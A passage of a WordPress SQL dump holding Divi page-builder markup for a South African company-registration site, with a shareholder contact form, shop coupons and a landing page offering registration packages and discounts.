field_id=\"Company_Name\" field_title=\"Company Name\" _builder_version=\"3.2.1\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Is_The_Company_Owner_Managed\" field_title=\"Is The Company Owner Managed\" field_type=\"radio\" radio_options=\"%91{%22value%22:%22yes%22,%22checked%22:0,%22dragID%22:0},{%22value%22:%22no%22,%22checked%22:0,%22dragID%22:1}%93\" fullwidth_field=\"on\" _builder_version=\"3.2.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Is_The_More_Then_One_Shareholder\" field_title=\"Is The More Then One Shareholder \" field_type=\"radio\" radio_options=\"%91{%22value%22:%22yes%22,%22checked%22:0,%22dragID%22:0},{%22value%22:%22no%22,%22checked%22:0,%22dragID%22:1}%93\" fullwidth_field=\"on\" conditional_logic=\"on\" conditional_logic_rules=\"%91{%22field%22:%22is_the_company_owner_managed%22,%22condition%22:%22is%22,%22value%22:%22yes%22}%93\" _builder_version=\"3.2.2\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','selection process','','publish','closed','closed','','selection-process','','','2018-05-14 10:40:23','2018-05-14 08:40:23','',0,'https://companyregistration.online/?page_id=29111',0,'page','',0),(29115,3,'2018-05-11 16:18:26','2018-05-11 14:18:26','[et_pb_row _builder_version=\"3.0.47\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" template_type=\"row\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blog fullwidth=\"off\" posts_number=\"18\" show_more=\"on\" show_categories=\"off\" show_pagination=\"off\" _builder_version=\"3.0.97\" header_font=\"|700|||||||\" header_text_color=\"#8300e9\" header_font_size=\"21px\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\"][/et_pb_blog][/et_pb_column][/et_pb_row]','blog section','','publish','closed','closed','','blog-section','','','2018-05-11 16:18:26','2018-05-11 14:18:26','',0,'https://companyregistration.online/et_pb_layout/blog-section/',0,'et_pb_layout','',0),(29161,1,'2018-05-14 14:50:52','2018-05-14 12:50:52','','customisemore','20% discount for purchases greater than R1500 ','publish','closed','closed','','customisemore','','','2018-05-14 14:50:52','2018-05-14 12:50:52','',0,'https://companyregistration.online/?post_type=shop_coupon&#038;p=29161',0,'shop_coupon','',0);
INSERT INTO `wpxb_posts` VALUES (29342,3,'2018-12-10 08:35:58','2018-12-10 06:35:58','[et_pb_section fb_built=\"1\" _builder_version=\"3.17.6\"][et_pb_row make_fullwidth=\"on\" custom_padding=\"10px|0px|0px|0px\" custom_margin=\"|||\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" admin_label=\"Flags\" _builder_version=\"3.2.1\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2017/07/Sa-Flag-optimised.png\" _builder_version=\"3.0.89\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2017/07/Sa-Flag-optimised.png\" align=\"right\" disabled_on=\"on|on|off\" _builder_version=\"3.2.1\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"0|15px|0px|14px|false|false\" custom_margin=\"|||\" make_equal=\"on\" _builder_version=\"3.2.1\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Owner Managed\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Multiple Shareholders\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  2 or more shareholders directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" next_background_color=\"#ffffff\" admin_label=\"Header\" _builder_version=\"3.17.6\" background_color=\"rgba(239,103,40,0.96)\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#2130b7\" background_color_gradient_end=\"#ff915e\" background_color_gradient_direction=\"148deg\" background_color_gradient_start_position=\"19%\" background_image=\"https://companyregistration.online/wp-content/uploads/2018/12/software-06.png\" parallax=\"on\" custom_margin=\"||||false\" custom_padding=\"0||16vw||false|false\" bottom_divider_style=\"arrow\" bottom_divider_height=\"29vw\" bottom_divider_repeat=\"0.7x\"][et_pb_row make_fullwidth=\"on\" custom_padding=\"20px|20px|124px|20px|false|false\" custom_margin=\"||20px|\" _builder_version=\"3.17.6\" background_color=\"rgba(12,113,195,0.05)\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" box_shadow_style=\"preset3\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"roll\" animation_duration=\"1050ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\r\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" image=\"https://companyregistration.online/wp-content/uploads/2018/05/MOneyBack.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset2\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.27)\" background_color_gradient_direction=\"151deg\" background_color_gradient_start_position=\"74%\" box_shadow_style=\"preset2\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"47px||47px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"roll\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\r\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.0.85\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row make_fullwidth=\"on\" custom_padding=\"0px|0px|0px|0px\" _builder_version=\"3.0.58\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.3.1\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" tab_font=\"Abel||||\" tab_font_size=\"17px\" body_font=\"||||\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.2.2\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.3.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Features\" _builder_version=\"3.17.6\"][et_pb_row _builder_version=\"3.17.6\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"40px\" header_2_font_size_tablet=\"26px\" header_2_font_size_phone=\"20px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height=\"1.4em\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#ff885a\" header_3_font_size=\"13px\" header_3_letter_spacing=\"2px\" header_3_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" locked=\"off\"]<h3>Products</h3>\n<h2>We Build Tools For the Web</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" next_background_color=\"#ffffff\" admin_label=\"Feature\" _builder_version=\"3.17.6\" background_color=\"rgba(239,103,40,0.96)\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#b3afff\" background_color_gradient_start_position=\"19%\" parallax=\"on\" custom_padding=\"10vw||||false|false\" custom_padding_tablet=\"||10vw\" bottom_divider_style=\"arrow\" bottom_divider_height=\"29vw\" bottom_divider_repeat=\"0.7x\" bottom_divider_height_tablet=\"90px\" bottom_divider_height_last_edited=\"on|tablet\" bottom_divider_repeat_tablet=\"0x\" bottom_divider_repeat_last_edited=\"on|desktop\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\"][et_pb_row _builder_version=\"3.17.6\"][et_pb_column type=\"1_2\" _builder_version=\"3.17.6\" parallax=\"off\" parallax_method=\"on\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2018/12/software-23.png\" _builder_version=\"3.17.6\" custom_margin=\"|||-8vw\" custom_margin_tablet=\"|||0vw\" 